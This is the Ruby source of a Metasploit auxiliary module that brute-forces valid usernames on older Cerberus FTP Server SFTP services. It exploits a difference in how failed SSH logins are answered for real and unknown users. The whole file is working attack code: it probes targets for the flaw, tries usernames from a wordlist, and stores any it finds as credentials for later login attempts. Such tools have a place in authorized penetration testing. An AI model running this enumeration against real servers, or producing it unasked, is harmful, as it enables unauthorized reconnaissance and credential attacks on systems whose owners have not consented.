Cerberus FTP Server SFTP Username Enumeration

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'net/ssh'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Cerberus FTP Server SFTP Username Enumeration',  
'Description' => %q{  
This module uses a dictionary to brute force valid usernames from  
Cerberus FTP server via SFTP. This issue affects all versions of  
the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy  
in the way the SSH service handles failed logins for valid and invalid  
users. This issue was discovered by Steve Embling.  
},  
'Author' => [  
'Steve Embling', # Discovery  
'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module  
],  
'References' =>  
[  
[ 'URL', 'http://xforce.iss.net/xforce/xfdb/93546' ],  
[ 'BID', '67707']  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2014-05-27'  
))  
  
register_options(  
[  
Opt::Proxies,  
Opt::RPORT(22),  
OptPath.new(  
'USER_FILE',  
[true, 'Files containing usernames, one per line', nil])  
], self.class  
)  
  
register_advanced_options(  
[  
OptInt.new(  
'RETRY_NUM',  
[true , 'The number of attempts to connect to a SSH server for each user', 3]),  
OptInt.new(  
'SSH_TIMEOUT',  
[true, 'Specify the maximum time to negotiate a SSH session', 10]),  
OptBool.new(  
'SSH_DEBUG',  
[true, 'Enable SSH debugging output (Extreme verbosity!)', false])  
]  
)  
end  
  
def rport  
datastore['RPORT']  
end  
  
def retry_num  
datastore['RETRY_NUM']  
end  
  
def check_vulnerable(ip)  
opt_hash = {  
:port => rport,  
:auth_methods => ['password', 'keyboard-interactive'],  
:use_agent => false,  
:config => false,  
:password_prompt => Net::SSH::Prompt.new,  
:non_interactive => true,  
:proxies => datastore['Proxies'],  
:verify_host_key => :never  
}  
  
begin  
transport = Net::SSH::Transport::Session.new(ip, opt_hash)  
rescue Rex::ConnectionError  
return :connection_error  
end  
  
auth = Net::SSH::Authentication::Session.new(transport, opt_hash)  
auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))  
auth_method = auth.allowed_auth_methods.join('|')  
print_good "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"  
report_service(  
host: ip,  
port: rport,  
name: "ssh",  
proto: "tcp",  
info: auth.transport.server_version.version  
)  
  
if auth_method.empty?  
:vulnerable  
else  
:safe  
end  
end  
  
def check_user(ip, user, port)  
pass = Rex::Text.rand_text_alphanumeric(8)  
  
opt_hash = {  
:auth_methods => ['password', 'keyboard-interactive'],  
:port => port,  
:use_agent => false,  
:config => false,  
:proxies => datastore['Proxies'],  
:verify_host_key => :never  
}  
  
opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']  
transport = Net::SSH::Transport::Session.new(ip, opt_hash)  
auth = Net::SSH::Authentication::Session.new(transport, opt_hash)  
  
begin  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
auth.authenticate("ssh-connection", user, pass)  
auth_method = auth.allowed_auth_methods.join('|')  
if auth_method != ''  
:success  
else  
:fail  
end  
end  
rescue Rex::ConnectionError  
return :connection_error  
rescue Net::SSH::Disconnect, ::EOFError  
return :success  
rescue ::Timeout::Error  
return :connection_error  
end  
end  
  
def do_report(ip, user, port)  
service_data = {  
address: ip,  
port: rport,  
service_name: 'ssh',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: user,  
}.merge(service_data)  
  
login_data = {  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::UNTRIED,  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def peer(rhost=nil)  
"#{rhost}:#{rport} SSH -"  
end  
  
def user_list  
users = nil  
if File.readable? datastore['USER_FILE']  
users = File.new(datastore['USER_FILE']).read.split  
users.each {|u| u.downcase!}  
users.uniq!  
else  
raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"  
end  
  
users  
end  
  
def attempt_user(user, ip)  
attempt_num = 0  
ret = nil  
  
while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)  
if attempt_num > 0  
Rex.sleep(2 ** attempt_num)  
vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")  
end  
  
ret = check_user(ip, user, rport)  
attempt_num += 1  
end  
  
ret  
end  
  
def show_result(attempt_result, user, ip)  
case attempt_result  
when :success  
print_good "#{peer(ip)} User '#{user}' found"  
do_report(ip, user, rport)  
when :connection_error  
print_error "#{peer(ip)} User '#{user}' could not connect"  
when :fail  
vprint_status "#{peer(ip)} User '#{user}' not found"  
end  
end  
  
def run_host(ip)  
print_status "#{peer(ip)} Checking for vulnerability"  
case check_vulnerable(ip)  
when :vulnerable  
print_good "#{peer(ip)} Vulnerable"  
print_status "#{peer(ip)} Starting scan"  
user_list.each do |user|  
show_result(attempt_user(user, ip), user, ip)  
end  
when :safe  
print_error "#{peer(ip)} Not vulnerable"  
when :connection_error  
print_error "#{peer(ip)} Connection failed"  
end  
end  
end  
  
`